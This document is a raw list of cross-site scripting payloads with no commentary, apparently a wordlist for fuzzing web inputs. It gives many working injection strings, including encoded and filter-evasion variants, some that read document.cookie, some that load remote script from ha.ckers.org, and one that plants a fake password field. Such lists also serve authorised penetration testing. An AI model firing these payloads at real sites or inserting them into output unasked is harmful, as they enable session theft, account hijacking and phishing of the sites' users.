"><script>alert("Cross_Site_Scripting_Found") </script> 
"><script>alert(String.fromCharCode(67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103))</script> 
"><script>eval(String.fromCharCode(97,108,101,114,116,40,34,67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103,34,41))</script>
<input/onclick=eval(String.fromCharCode(97,108,101,114,116,40,34,67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103,34,41))>
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>

"><script>alert(567)</script>
"><script>prompt("Infosec_Says","Cross_Site_Scripting_Found")</script>
"><script>prompt(String.fromCharCode(67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103,95,70,111,117,110,100))</script>
"><script>eval(String.fromCharCode(112,114,111,109,112,116,40,34,73,110,102,111,115,101,99,95,83,97,121,115,34,44,34,67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103,95,70,111,117,110,100,34,41))</script>
"><input autofocus onfocus=alert("Cross_Site_Scripting_Found")>
"><input/autofocus//onfocus=alert("Cross_Site_Scripting_Found")>
"><img src="<img src" onmouseover=alert('Cross_Site_Scripting_Found')>
"><img src="<img src" onerror=alert('Cross_Site_Scripting_Found')>
"><ScRiPt>alert("Cross_Site_Scripting_Found")</ScRiPt>
"><ScRiPt/n>eval(String.fromCharCode(97,108,101,114,116,40,34,67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103,34,41))</ScRiPt>
"><ScRiPt>prompt("Infosec_Says","Cross_Site_Scripting_Found")</ScRiPt>
%22%3E%3CScRiPt%3Ealert(%22Cross_Site_Scripting_Found%22)%3C%2FScRiPt%3E
%2522%253E%253CScRiPt%253Ealert(%2522Cross_Site_Scripting_Found%2522)%253C%252FScRiPt%253E
"><scr<script>ipt>alert("Cross_Site_Scripting_Found") ;//</scr<script>ipt> 
" onfocus="alert('Cross_Site_Scripting_Found')
" onclick="alert('Cross_Site_Scripting_Found')
" onmouseover="alert('Cross_Site_Scripting_Found')
" onmousemove="alert('Cross_Site_Scripting_Found')
" onmouseout="alert('Cross_Site_Scripting_Found')
'; alert('Cross_Site_Scripting_Found'); 
<a href="javascript:alert('Cross_Site_Scripting_Found')">Alert</a>
<x href="javascript:alert('Cross_Site_Scripting_Found')">Alert</x>
<a/href="javascript:alert('Cross_Site_Scripting_Found')">Alert</a>
<object data="data:text/html,<script>alert('Cross_Site_Scripting_Found')</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnQ3Jvc3NfU2l0ZV9TY3JpcHRpbmdfRm91bmQnKTwvc2NyaXB0Pg==">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnQ3Jvc3NfU2l0ZV9TY3JpcHRpbmdfRm91bmQnKTwvc2NyaXB0Pg==">Alert</a>
<iframe src="javascript:alert('Cross_Site_Scripting_Found')">
<object data=javascript:alert('Cross_Site_Scripting_Found')>
<iframe src=javascript:alert('Cross_Site_Scripting_Found')>
<embed src=javascript:alert('Cross_Site_Scripting_Found')>
"><script/n>alert("Cross_Site_Scripting_Found") </script> 
"><script/n>eval(String.fromCharCode(97,108,101,114,116,40,34,67,114,111,115,115,95,83,105,116,101,95,83,99,114,105,112,116,105,110,103,34,41))</script>
"><script>a&#x6c;ert("Cross_Site_Scripting_Found") </script> 
"><script>a&#x6c;&#x65;&#x72;&#x74;("Cross_Site_Scripting_Found") </script>
<a href="jav&#x61;&#x73;cript:alert('Cross_Site_Scripting_Found')">Alert</a>
<a href="jav&#x61;&#x73;cript:a&#x6c;ert('Cross_Site_Scripting_Found')">Alert</a>
"><<script/n>alert("Cross_Site_Scripting_Found") </script>>
+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
<img src="<img  gif" alt="? />" onload=alert(1);
<body onscroll=alert('Cross_Site_Scripting_Found')>
<body onmousemove=alert('Cross_Site_Scripting_Found')>
<body onmouseover=alert('Cross_Site_Scripting_Found')>
<script>eval('a\l\ert\(document.cookie\)');</script>
<script>eval('al'+'ert(document.cookie)');</script>
<script>eval(atob('YWxlcnQoJ0Nyb3NzX1NpdGVfU2NyaXB0aW5nX0ZvdW5kJyk='));</script>
<script>with(document)alert(cookie)</script>
<script>alert(documet['cookie'])</script>
<script>'alert("Cross_Site_Scripting_Found")'.replace(/.+/,eval)</script>
</script><script>alert("Cross_Site_Scripting_Found")</script>
<body onscroll=alert("Cross_Site_Scripting_Found")>
<body onmousemove=alert("Cross_Site_Scripting_Found")>
<script>document.write("Enter your password to contiune<input type=password/>")</script>
"><IFRAME SRC="javascript:alert("JamalC0m_Groups");"></IFRAME>
%uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e -- .net
"><script>"
"><script>alert("XSS")</script>
"><script>alert(99)</script>
"style%3d"behavior %3aurl(%23default%23time2 )"onbegin%3d"alert(1)
%2BADw-script%2BAD4-alert%281234%29%2BADw-/script%2BAD4-
%3cscript%3ealert("XSS");%3c/script%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert(1)%3c%2fscript%3e
%3cscript%3ealert(1);%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%EF%BC%9Cscript%EF%BC%9Ealert%281%29%EF%BC%9C%2Fscript%EF%BC%9E 
%uff1cscript%uff1ealert%uff08188%uff09%uff1c/script%uff1e
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
&ltscript&gtalert(1);&ltscript&gtalert
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'';!--"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\
';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\
";alert(String.fromCharCode(88,83,83))//>
</SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert(String.fromCharCode<script>alert('xss')</script>
'><script>alert(1);</script>
'><script>alert(1)</script>
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<![CDATA[><IMG SRC="javascript:alert('XSS')" onmouseover="javascript:alert(123)">]]>";
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<<script>alert("XSS");//<</script>
<<script>alert(1);//<</script>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert(1);">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert(1);">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert(1);">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert(1);">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=`javascript:alert("'XSS'")`>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(1)>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC='javasc	ript:alert(1)'>
<IMG%20SRC='javasc	ript:alert(document.cookie)'>
<IMG%20SRC='javascript:alert(1)'>
<IMG%20SRC='javascript:alert(document.cookie)'>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<script>alert("XSS")</script>
<script>alert(99)</script>
<script>alert(document.cookie)</script>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<xss><script>alert('XSS')</script></vulnerable>
\";alert('XSS');//
\";alert('XSS');//
a"onmouseover="alert(216)"
¼script¾alert(¢XSS¢)¼/script¾
“onload=alert(1)//’
“onMouseOver=alert(1)//’
%u3008script%u3009alert(1)%u3008/script%u3009
<video src=1 onerror=alert(1);
<ScRiPt>alert(1)</ScRiPt>
¼script¾alert(¢XSS¢)¼/script¾
%253CScRipT%253Ealert(0)%253C%252FScRipT%253E
1'+eval('alert(1)')
<%tag style=xss:expression(alert(1))>
<[%00]img onerror=alert(1) src=a.jpg>
<img[%09]onerror=alert(1) src=a>
<img[%0d]onerror=alert(1) src=a>
<img[%0a]onerror=alert(1) src=a>
<img/”onerror=alert(1) src=a>
<img/’onerror=alert(1) src=a>
<img/anyjunk/onerror=alert(1) src=a>
